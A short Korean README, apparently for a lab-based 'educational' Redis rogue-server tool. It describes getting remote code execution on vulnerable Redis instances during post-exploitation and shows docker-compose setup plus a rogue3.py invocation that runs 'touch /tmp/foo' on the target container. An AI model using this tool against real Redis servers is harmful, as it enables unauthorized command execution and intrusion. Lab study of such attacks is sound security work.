
교육용 Redis rogue server 도구로, 사후 침투(post-exploitation) 단계에서 사용됩니다. 악성 Redis 서버를 배포하여 취약한 Redis 인스턴스에서 원격 코드 실행을 달성하고 임의 명령을 실행합니다.
교육 목적으로만 사용하세요
$ docker-compose build
$ docker-compose up -d
$ docker-compose exec rogue sh
/rogue/redis-rogue-server # python3 rogue3.py --rhost redis --rport 6379 --lhost rogue --lport 21000
...
[<<] touch /tmp/foo
$ docker-compose exec redis sh
/data # ls /tmp/
foo